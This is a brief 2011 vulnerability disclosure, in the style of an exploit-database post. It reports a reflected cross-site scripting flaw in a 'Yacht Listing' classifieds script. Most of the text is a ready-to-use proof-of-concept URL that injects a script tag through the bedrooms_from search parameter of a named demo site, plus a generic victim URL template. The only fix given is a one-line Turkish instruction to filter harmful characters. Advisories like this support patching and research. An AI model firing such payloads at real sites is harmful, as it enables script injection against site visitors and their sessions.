< ------------------- header data start ------------------- >

# Application Name: Yacht Listing Cross Site Scripting Vuln.

# Author: expulse ~ Bug Researchers

# Date: 31.07.2011

# Example: http://www.classifiedsgeek.com/yacht-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=><script>alert(document.domain)</script>

# Vulnerable Type: Reflected XSS

# Fixed: Zararli Karakterler Filitrelenmelidir.


< -- bug code start -- >



http://victim/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=XSSAttack]

< -- bug code end of -- >

< ------------------- header data end of ------------------- >